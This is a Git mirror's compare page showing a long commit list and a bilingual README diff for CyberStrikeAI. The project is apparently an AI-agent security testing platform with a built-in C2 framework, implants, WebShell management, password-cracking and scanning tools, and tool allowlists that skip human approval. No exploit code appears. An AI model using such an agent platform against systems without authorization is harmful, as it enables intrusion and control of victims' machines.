mirror of
https://github.com/Ed1s0nZ/CyberStrikeAI.git
synced 2026-06-24 06:49:59 +02:00
Compare commits
236 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 47486a49c2 | |||
| 476727933d | |||
| 8bb50e8323 | |||
| e74f2a2292 | |||
| 4799d0dba7 | |||
| 1db917061d | |||
| 41cd7db30f | |||
| 68b3265f3f | |||
| 05dc4395a1 | |||
| 637a35748b | |||
| 5d77a99236 | |||
| e84d936f85 | |||
| e748201ae8 | |||
| 7a3c67458c | |||
| 6e9e43eec8 | |||
| bca86e48ae | |||
| 3f3b8b4db4 | |||
| b366dc0287 | |||
| a52452ceea | |||
| 5b87667782 | |||
| 4f0e812d37 | |||
| 79691c021f | |||
| 5a8309a015 | |||
| 6244197339 | |||
| eb14aca05a | |||
| 091e8a4da8 | |||
| 48ce0c519e | |||
| afc37051c0 | |||
| 2964247361 | |||
| 02919df476 | |||
| c3294d96a2 | |||
| c8b8b41bda | |||
| 9a4c333b90 | |||
| 8e21ae290a | |||
| b9d102d046 | |||
| 8c85494a05 | |||
| c3d2a41301 | |||
| 1a2e282d46 | |||
| 8129f2147f | |||
| 4a9889f0af | |||
| 732d47a965 | |||
| e22382aab0 | |||
| b6ff80adf2 | |||
| 51f1cfde2f | |||
| b2c8913014 | |||
| ae98288b62 | |||
| 9955e856a0 | |||
| 018544e5f9 | |||
| c1c86e4632 | |||
| 08d77bc12b | |||
| ce73a7b3e4 | |||
| f78f424aab | |||
| e19d8e39bd | |||
| ecf594a25b | |||
| d5759f6d83 | |||
| 81b3f64b15 | |||
| 0e0f1352f0 | |||
| ffba311afd | |||
| d9ed36cfb1 | |||
| b7f80b78ee | |||
| 8f8e5cfff5 | |||
| 120f860640 | |||
| 90cd119a83 | |||
| 56d597e0c5 | |||
| 11ab5cde8f | |||
| 46a7d338a4 | |||
| 46f68cc1d4 | |||
| 7003cdb2e3 | |||
| 4e5e6208bd | |||
| 6a7e78a846 | |||
| 88c6fbfb75 | |||
| 1cd6d0fa90 | |||
| 24390db100 | |||
| c000fe5195 | |||
| 0b4a11d01a | |||
| d433e44a7d | |||
| 7de51fe0ea | |||
| a354cf97e5 | |||
| c180f07c7e | |||
| 15730d3ef4 | |||
| b7fa18b6d4 | |||
| 8d622f63ff | |||
| 20b05146fb | |||
| d8768eae76 | |||
| 9232cee38d | |||
| 6c975e63d2 | |||
| e175523b82 | |||
| ae23427d9e | |||
| 93a2504ce3 | |||
| 09b0479fb3 | |||
| 2bdc9d4fe0 | |||
| 01b3d8056c | |||
| ed479d5e4d | |||
| a49f595231 | |||
| 82cf014a5e | |||
| 508de5fad0 | |||
| 6712344411 | |||
| 7eadccbff6 | |||
| 01b361e4a7 | |||
| f6ce31c961 | |||
| d5a0f93c6c | |||
| 56faefaaf9 | |||
| 16e9c5874a | |||
| 41b5cdde6b | |||
| cf1f8515d9 | |||
| 5e2b30c029 | |||
| 8c7c22369e | |||
| 9b1aba692b | |||
| db730b48c1 | |||
| dfb7dd7390 | |||
| 9f6eb33047 | |||
| 616d87f4cc | |||
| 8d999792b8 | |||
| afae8970d1 | |||
| 4d7330c5c3 | |||
| 8884bfb0b4 | |||
| fb351c80b6 | |||
| 664834e338 | |||
| 95bf62db88 | |||
| 656242614d | |||
| a9d6d8c00e | |||
| 0d6a43c0a8 | |||
| 702f286eb1 | |||
| f4906543a8 | |||
| b073421637 | |||
| 08436c27aa | |||
| 25ce0b221f | |||
| 87e629f270 | |||
| 04f8d73b0e | |||
| 33e4f023b5 | |||
| fc2e822448 | |||
| 7487c45799 | |||
| 6c4b3bf131 | |||
| 54cea1b172 | |||
| b8775997e4 | |||
| 4223ec47f9 | |||
| 9887589d99 | |||
| b7c01f41c7 | |||
| 1d3b4c44e1 | |||
| cbd64173b8 | |||
| af71c6aa24 | |||
| 97a73a1cb6 | |||
| 83e1c707ca | |||
| 96ccbff77c | |||
| c4bd8b93f6 | |||
| d005268d28 | |||
| 7f4e8d2ad2 | |||
| f3be355820 | |||
| bf0ce33e3f | |||
| 4661862a1a | |||
| f319a0f243 | |||
| 15c4802319 | |||
| 6ffde48b0c | |||
| c5e2f0d95d | |||
| 28a826d5b7 | |||
| 6365de7018 | |||
| 2e4bf7197b | |||
| ed4ba08163 | |||
| 8b5e55a673 | |||
| e8a75e5105 | |||
| 48976ed650 | |||
| dc9ecae7fd | |||
| a9d0a59f7a | |||
| 5ec4729b83 | |||
| 9857003018 | |||
| a6e7885fed | |||
| e69375451c | |||
| 07e7f104ad | |||
| ffce9185bb | |||
| 612f16455d | |||
| ecd5b40bc2 | |||
| 5aa7306c9b | |||
| 1027d9f6cf | |||
| e05b008903 | |||
| 9bcc7a27fe | |||
| fb3087b760 | |||
| cd48a43b7e | |||
| 07be48ae59 | |||
| 529f94a4f7 | |||
| d2fe023d7e | |||
| 09e858619e | |||
| 9c54291295 | |||
| b3f7b8494b | |||
| 849c644a86 | |||
| 9e0525abc1 | |||
| 6bacac2e6a | |||
| 244307b52c | |||
| faaac5fbd7 | |||
| 3392fefedf | |||
| abef51b805 | |||
| 8143d8f220 | |||
| 73337c5226 | |||
| c9c9ca1eec | |||
| 25f8b610fb | |||
| 6bfa7b8959 | |||
| 99a41d8188 | |||
| 6d04753761 | |||
| a08df7ab79 | |||
| 3123a07c48 | |||
| 7b3d35fabe | |||
| cb17d3a5c1 | |||
| c2892ccd33 | |||
| 60b0bb3252 | |||
| 3b9e5f3b1c | |||
| 1a9694b216 | |||
| a1c7e0dc7d | |||
| 23e08b1697 | |||
| 9002505569 | |||
| b1aaaa79c7 | |||
| 4edbeb8f2d | |||
| 5b5a532d4f | |||
| c1bd94684c | |||
| 8b48e5e396 | |||
| c2f8ebc743 | |||
| 15e1a15671 | |||
| 5c3b157159 | |||
| e5f6175277 | |||
| 1dc5d18fb3 | |||
| 00ea3d7a9c | |||
| 8d48ccdfe4 | |||
| c9f1a2001e | |||
| 905dd519ed | |||
| 60ea106301 | |||
| 92c0ae19bb | |||
| 43c6a0648d | |||
| 6b96e77120 | |||
| a397922361 | |||
| 1e6e92b4af | |||
| 444f85b9c4 | |||
| 679a8192ae | |||
| 9a3f5e54b0 | |||
| ce2eb56253 | |||
| da6cb347df | |||
| fb2658b2eb | |||
| e791782c46 | |||
| 9b0efbb90f |
@@ -29,7 +29,6 @@ If CyberStrikeAI helps you, you can support the project via **WeChat Pay** or **
|
|||||||
|
|
||||||
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
|
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
|
||||||
|
|
||||||
|
|
||||||
## Interface & Integration Preview
|
## Interface & Integration Preview
|
||||||
|
|
||||||
<div align="center">
|
<div align="center">
|
||||||
@@ -113,13 +112,13 @@ CyberStrikeAI is an **AI-native security testing platform** built in Go. It inte
|
|||||||
- 🔒 Password-protected web UI, audit logs, and SQLite persistence
|
- 🔒 Password-protected web UI, audit logs, and SQLite persistence
|
||||||
- 📚 Knowledge base (RAG) with embedding-based vector retrieval (cosine similarity), optional **Eino Compose** indexing pipeline, and configurable post-retrieval budgets / reranking hooks
|
- 📚 Knowledge base (RAG) with embedding-based vector retrieval (cosine similarity), optional **Eino Compose** indexing pipeline, and configurable post-retrieval budgets / reranking hooks
|
||||||
- 📁 Conversation grouping with pinning, rename, and batch management
|
- 📁 Conversation grouping with pinning, rename, and batch management
|
||||||
- 📂 **Project management**: group conversations and vulnerabilities by project; **shared facts** (project blackboard) persist cross-session context (targets, env, auth notes) with auto-injection for agents and MCP tools (`upsert_project_fact`, `get_project_fact`, …)
|
- 📂 **Project management**: shared facts (blackboard) across sessions, `upsert_project_fact` + `links` to chain paths; attack-chain and project fact graph views
|
||||||
- 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics
|
- 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics
|
||||||
- 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially
|
- 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially
|
||||||
- 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions
|
- 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions
|
||||||
- 🧩 **Agent orchestration (CloudWeGo Eino)**: **single-agent** via **`/api/eino-agent/stream`** (Eino ADK `ChatModelAgent`); **multi-agent** via **`/api/multi-agent/stream`** with **`deep`** (coordinator + `task` sub-agents), **`plan_execute`**, or **`supervisor`** (`orchestration` in the request body). Markdown under `agents/`: `orchestrator.md`, `orchestrator-plan-execute.md`, `orchestrator-supervisor.md`, plus sub-agent `*.md` (see [Multi-agent doc](docs/MULTI_AGENT_EINO.md))
|
- 🧩 **Agent orchestration (CloudWeGo Eino)**: **single-agent** via **`/api/eino-agent/stream`** (Eino ADK `ChatModelAgent`); **multi-agent** via **`/api/multi-agent/stream`** with **`deep`** (coordinator + `task` sub-agents), **`plan_execute`**, or **`supervisor`** (`orchestration` in the request body). ADK **summarization** compresses long contexts; pre-compaction **transcripts** land at `data/conversation_artifacts/<conversation-id>/summarization/transcript.txt` (full user/assistant/tool turns; static system omitted). Markdown under `agents/`: `orchestrator.md`, `orchestrator-plan-execute.md`, `orchestrator-supervisor.md`, plus sub-agent `*.md` (see [Multi-agent doc](docs/MULTI_AGENT_EINO.md))
|
||||||
- 🖼️ **Vision analysis (`analyze_image`)**: separate VL model (e.g. `qwen-vl-max`) via MCP for local screenshots, captchas, and UI; image bytes stay out of agent history (text summaries only). Configure `vision` in `config.yaml`; see [docs/VISION.md](docs/VISION.md)
|
- 🖼️ **Vision analysis (`analyze_image`)**: separate VL model (e.g. `qwen-vl-max`) via MCP for local screenshots, captchas, and UI; image bytes stay out of agent history (text summaries only). Configure `vision` in `config.yaml`; see [docs/VISION.md](docs/VISION.md)
|
||||||
- 🎯 **Skills (refactored for Eino)**: packs under `skills_dir` follow **Agent Skills** layout (`SKILL.md` + optional files); **multi-agent** sessions use the official Eino ADK **`skill`** tool for **progressive disclosure** (load by name), with optional **host filesystem / shell** via `multi_agent.eino_skills`; optional **`eino_middleware`** adds patchtoolcalls, tool_search, plantask, reduction, checkpoints, and Deep tuning—20+ sample domains (SQLi, XSS, API security, …) ship under `skills/`
|
- 🎯 **Skills (refactored for Eino)**: packs under `skills_dir` follow **Agent Skills** layout (`SKILL.md` + optional files); **multi-agent** sessions use the official Eino ADK **`skill`** tool for **progressive disclosure** (load by name), with optional **host filesystem / shell** via `multi_agent.eino_skills`; optional **`eino_middleware`** adds patchtoolcalls, tool_search, **plantask** (`TaskCreate` / `TaskList` boards under `skills_dir/.eino/plantask/`), reduction, file **checkpoints** (`checkpoint_dir`), ChatModel **retries**, session **output key**, and Deep tuning—20+ sample domains (SQLi, XSS, API security, …) ship under `skills/`
|
||||||
- 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands)
|
- 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands)
|
||||||
- 🧑⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals
|
- 🧑⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals
|
||||||
- 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter.
|
- 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter.
|
||||||
@@ -190,14 +189,21 @@ The `run.sh` script will automatically:
|
|||||||
```
|
```
|
||||||
- Or edit `config.yaml` directly before launching
|
- Or edit `config.yaml` directly before launching
|
||||||
2. **Login** - Use the auto-generated password shown in the console (or set `auth.password` in `config.yaml`)
|
2. **Login** - Use the auto-generated password shown in the console (or set `auth.password` in `config.yaml`)
|
||||||
3. **Install security tools (optional)** - Install tools as needed:
|
3. **Install security tools (optional)** - Install tools from `tools/` as needed; missing tools are skipped or substituted at runtime. Common examples:
|
||||||
|
|
||||||
|
**macOS (Homebrew):**
|
||||||
```bash
|
```bash
|
||||||
# macOS
|
brew install nmap masscan sqlmap nikto gobuster ffuf hydra hashcat nuclei subfinder
|
||||||
brew install nmap sqlmap nuclei httpx gobuster feroxbuster subfinder amass
|
|
||||||
# Ubuntu/Debian
|
|
||||||
sudo apt-get install nmap sqlmap nuclei httpx gobuster feroxbuster
|
|
||||||
```
|
```
|
||||||
AI automatically falls back to alternatives when a tool is missing.
|
|
||||||
|
**Linux (Kali / Debian / Ubuntu):**
|
||||||
|
```bash
|
||||||
|
sudo apt update
|
||||||
|
sudo apt install -y nmap masscan sqlmap nikto gobuster hydra hashcat john binwalk
|
||||||
|
# On some distros, install ffuf/nuclei/subfinder via go install or upstream docs
|
||||||
|
```
|
||||||
|
|
||||||
|
See the `tools/` directory for the full list; refer to each tool's official docs for install details.
|
||||||
|
|
||||||
**Alternative Launch Methods:**
|
**Alternative Launch Methods:**
|
||||||
```bash
|
```bash
|
||||||
@@ -260,7 +266,7 @@ Requirements / tips:
|
|||||||
- **Predefined roles** – System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory.
|
- **Predefined roles** – System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory.
|
||||||
- **Custom prompts** – Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas.
|
- **Custom prompts** – Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas.
|
||||||
- **Tool restrictions** – Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities).
|
- **Tool restrictions** – Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities).
|
||||||
- **Skills** – Skill packs live under `skills_dir` and load via the Eino ADK **`skill`** tool (**progressive disclosure**) in both **single- and multi-agent** sessions when **`multi_agent.eino_skills`** is enabled. Optional host **read_file / glob / grep / write / edit / execute** and **`eino_middleware`** (tool_search, reduction, checkpoints, etc.) apply per mode—see docs.
|
- **Skills** – Skill packs live under `skills_dir` and load via the Eino ADK **`skill`** tool (**progressive disclosure**) in both **single- and multi-agent** sessions when **`multi_agent.eino_skills`** is enabled. Optional host **read_file / glob / grep / write / edit / execute** and **`eino_middleware`** (tool_search, plantask, reduction, checkpoints, summarization transcripts, etc.) apply per mode—see docs.
|
||||||
- **Easy role creation** – Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, and `enabled` fields.
|
- **Easy role creation** – Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, and `enabled` fields.
|
||||||
- **Web UI integration** – Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions.
|
- **Web UI integration** – Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions.
|
||||||
|
|
||||||
@@ -288,6 +294,7 @@ Requirements / tips:
|
|||||||
- **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only.
|
- **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only.
|
||||||
- **Management** – Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`.
|
- **Management** – Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`.
|
||||||
- **Config** – `multi_agent` in `config.yaml`: `enabled`, `robot_default_agent_mode`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning).
|
- **Config** – `multi_agent` in `config.yaml`: `enabled`, `robot_default_agent_mode`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning).
|
||||||
|
- **Resilience & long runs** – `checkpoint_dir` enables ADK **resume** after process crashes (distinct from trace-based “interrupt & continue”). `deep_model_retry_max_retries` retries transient LLM API failures within a single call. **Summarization** writes a filtered **transcript** when compression fires; the summary message includes the path so the model can `read_file` for scan output and other pre-compaction details.
|
||||||
- **Details** – **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats).
|
- **Details** – **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats).
|
||||||
|
|
||||||
### Skills System (Agent Skills + Eino)
|
### Skills System (Agent Skills + Eino)
|
||||||
@@ -295,7 +302,7 @@ Requirements / tips:
|
|||||||
- **Runtime refactor** – **`skills_dir`** is the single root for packs. **Multi-agent** loads them through Eino’s official **`skill`** middleware (**progressive disclosure**: model calls `skill` with a pack **name** instead of receiving full SKILL text up front). Configure via **`multi_agent.eino_skills`**: `disable`, `filesystem_tools` (host read/glob/grep/write/edit/execute), `skill_tool_name`.
|
- **Runtime refactor** – **`skills_dir`** is the single root for packs. **Multi-agent** loads them through Eino’s official **`skill`** middleware (**progressive disclosure**: model calls `skill` with a pack **name** instead of receiving full SKILL text up front). Configure via **`multi_agent.eino_skills`**: `disable`, `filesystem_tools` (host read/glob/grep/write/edit/execute), `skill_tool_name`.
|
||||||
- **Eino / RAG** – Packages are also split into `schema.Document` chunks for `FilesystemSkillsRetriever` (`skills.AsEinoRetriever()`) in **compose** graphs (e.g. knowledge/indexing pipelines).
|
- **Eino / RAG** – Packages are also split into `schema.Document` chunks for `FilesystemSkillsRetriever` (`skills.AsEinoRetriever()`) in **compose** graphs (e.g. knowledge/indexing pipelines).
|
||||||
- **HTTP API** – `/api/skills` listing and `depth` (`summary` | `full`), `section`, and `resource_path` remain for the web UI and ops; **model-side** skill loading in multi-agent uses the **`skill`** tool, not MCP.
|
- **HTTP API** – `/api/skills` listing and `depth` (`summary` | `full`), `section`, and `resource_path` remain for the web UI and ops; **model-side** skill loading in multi-agent uses the **`skill`** tool, not MCP.
|
||||||
- **Optional `eino_middleware`** – e.g. `tool_search` (dynamic MCP tool list), `patch_tool_calls`, `plantask` (structured tasks; persistence defaults under a subdirectory of `skills_dir`), `reduction`, `checkpoint_dir`, Deep output key / model retries / task-tool description prefix—see `config.yaml` and `internal/config/config.go`.
|
- **Optional `eino_middleware`** – e.g. `tool_search` (dynamic MCP tool list), `patch_tool_calls`, **`plantask`** (Eino `TaskCreate` / `TaskGet` / `TaskUpdate` / `TaskList`; JSON under `skills_dir/.eino/plantask/<conversation-id>/`; Eino clears task files when **all** tasks are marked completed), `reduction`, **`checkpoint_dir`** (`data/eino-checkpoints/`), **`deep_model_retry_max_retries`**, **`deep_output_key`**, task-tool description prefix—see `config.yaml` and `internal/config/config.go`.
|
||||||
- **Shipped demo** – `skills/cyberstrike-eino-demo/`; see `skills/README.md`.
|
- **Shipped demo** – `skills/cyberstrike-eino-demo/`; see `skills/README.md`.
|
||||||
|
|
||||||
**Creating a skill:**
|
**Creating a skill:**
|
||||||
@@ -305,7 +312,7 @@ Requirements / tips:
|
|||||||
### Tool Orchestration & Extensions
|
### Tool Orchestration & Extensions
|
||||||
- **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata.
|
- **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata.
|
||||||
- **Directory hot-reload** – pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments.
|
- **Directory hot-reload** – pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments.
|
||||||
- **Large-result pagination** – outputs beyond 200 KB are stored as artifacts retrievable through the `query_execution_result` tool with paging, filters, and regex search.
|
- **Large tool outputs** – outputs beyond `reduction_max_length_for_trunc` are summarized via Eino reduction with full content persisted under `tmp/reduction/`; use `read_file` on the path in `<persisted-output>`.
|
||||||
- **Result compression** – multi-megabyte logs can be summarized or losslessly compressed before persisting to keep SQLite lean.
|
- **Result compression** – multi-megabyte logs can be summarized or losslessly compressed before persisting to keep SQLite lean.
|
||||||
|
|
||||||
**Creating a custom tool (typical flow)**
|
**Creating a custom tool (typical flow)**
|
||||||
@@ -543,7 +550,12 @@ multi_agent:
|
|||||||
orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty
|
orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty
|
||||||
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional
|
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional
|
||||||
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
|
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
|
||||||
# eino_middleware: optional patch_tool_calls, tool_search, plantask, reduction, checkpoint_dir, ...
|
# eino_middleware: plantask_enable, checkpoint_dir, deep_model_retry_max_retries, deep_output_key, ...
|
||||||
|
project:
|
||||||
|
enabled: true # Enable project blackboard & fact MCP tools
|
||||||
|
fact_index_max_runes: 65000
|
||||||
|
fact_summary_max_runes: 24000
|
||||||
|
default_inject_deprecated: false
|
||||||
```
|
```
|
||||||
|
|
||||||
### Tool Definition Example (`tools/nmap.yaml`)
|
### Tool Definition Example (`tools/nmap.yaml`)
|
||||||
|
|||||||
+26
-14
@@ -28,7 +28,6 @@
|
|||||||
|
|
||||||
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能、完整的测试生命周期管理能力,以及面向 **授权场景** 的 **内置轻量 C2(Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
|
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能、完整的测试生命周期管理能力,以及面向 **授权场景** 的 **内置轻量 C2(Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
|
||||||
|
|
||||||
|
|
||||||
## 界面与集成预览
|
## 界面与集成预览
|
||||||
|
|
||||||
<div align="center">
|
<div align="center">
|
||||||
@@ -112,13 +111,13 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
|
|||||||
- 🔒 Web 登录保护、审计日志、SQLite 持久化
|
- 🔒 Web 登录保护、审计日志、SQLite 持久化
|
||||||
- 📚 知识库(RAG):向量嵌入与余弦相似度检索(与 Eino `retriever.Retriever` 语义一致),可选 **Eino Compose** 索引流水线及检索后处理(预算、重排等配置项)
|
- 📚 知识库(RAG):向量嵌入与余弦相似度检索(与 Eino `retriever.Retriever` 语义一致),可选 **Eino Compose** 索引流水线及检索后处理(预算、重排等配置项)
|
||||||
- 📁 对话分组管理:支持分组创建、置顶、重命名、删除等操作
|
- 📁 对话分组管理:支持分组创建、置顶、重命名、删除等操作
|
||||||
- 📂 **项目管理**:按项目归类对话与漏洞;**共享事实**(项目黑板)在多会话间沉淀目标/环境/认证等认知,自动注入 Agent 上下文,支持 MCP 工具读写(`upsert_project_fact`、`get_project_fact` 等)
|
- 📂 **项目管理**:共享事实(黑板)跨会话沉淀认知,`upsert_project_fact` + `links` 串联攻击路径;聊天攻击链与项目事实图可视化
|
||||||
- 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板
|
- 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板
|
||||||
- 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪
|
- 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪
|
||||||
- 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制
|
- 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制
|
||||||
- 🧩 **Agent 编排(CloudWeGo Eino)**:**单代理** `POST /api/eino-agent/stream`(Eino ADK);**多代理** `POST /api/multi-agent/stream`,`orchestration` 选 **`deep`** / **`plan_execute`** / **`supervisor`**。`agents/` 下主代理与子代理 Markdown 见 [多代理说明](docs/MULTI_AGENT_EINO.md)
|
- 🧩 **Agent 编排(CloudWeGo Eino)**:**单代理** `POST /api/eino-agent/stream`(Eino ADK);**多代理** `POST /api/multi-agent/stream`,`orchestration` 选 **`deep`** / **`plan_execute`** / **`supervisor`**。ADK **Summarization** 在上下文过长时压缩历史;压缩前将可恢复 **转录** 写入 `data/conversation_artifacts/<会话ID>/summarization/transcript.txt`(保留完整 user/assistant/tool 轮次,省略静态 system)。`agents/` 下主代理与子代理 Markdown 见 [多代理说明](docs/MULTI_AGENT_EINO.md)
|
||||||
- 🖼️ **视觉分析(`analyze_image`)**:独立 Vision 模型(如 `qwen-vl-max`),MCP 工具分析本地截图/验证码/UI;图片仅在单次 VL 调用中出现,对话上下文只保留文字摘要。配置见 `config.yaml` → `vision` 与 [视觉分析说明](docs/VISION.md)
|
- 🖼️ **视觉分析(`analyze_image`)**:独立 Vision 模型(如 `qwen-vl-max`),MCP 工具分析本地截图/验证码/UI;图片仅在单次 VL 调用中出现,对话上下文只保留文字摘要。配置见 `config.yaml` → `vision` 与 [视觉分析说明](docs/VISION.md)
|
||||||
- 🎯 **Skills(面向 Eino 重构)**:技能包放在 **`skills_dir`**,遵循 **Agent Skills** 目录规范(`SKILL.md` + 可选文件);**多代理** 下通过 Eino 官方 **`skill`** 工具 **渐进式披露**(按 name 加载)。**`multi_agent.eino_skills`** 控制是否启用、本机文件/Shell 工具、工具名覆盖;**`eino_middleware`** 可选 patch、tool_search、plantask、reduction、断点目录及 Deep 调参。20+ 领域示例仍可绑定角色
|
- 🎯 **Skills(面向 Eino 重构)**:技能包放在 **`skills_dir`**,遵循 **Agent Skills** 目录规范(`SKILL.md` + 可选文件);**多代理** 下通过 Eino 官方 **`skill`** 工具 **渐进式披露**(按 name 加载)。**`multi_agent.eino_skills`** 控制是否启用、本机文件/Shell 工具、工具名覆盖;**`eino_middleware`** 可选 patch、tool_search、**plantask**(`TaskCreate` / `TaskList` 任务板,落在 `skills_dir/.eino/plantask/`)、reduction、文件型 **checkpoint**(`checkpoint_dir`)、ChatModel **重试**、会话 **输出键** 及 Deep 调参。20+ 领域示例仍可绑定角色
|
||||||
- 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md))
|
- 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md))
|
||||||
- 🧑⚖️ **人机协同(HITL)**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml` 的 `hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用
|
- 🧑⚖️ **人机协同(HITL)**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml` 的 `hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用
|
||||||
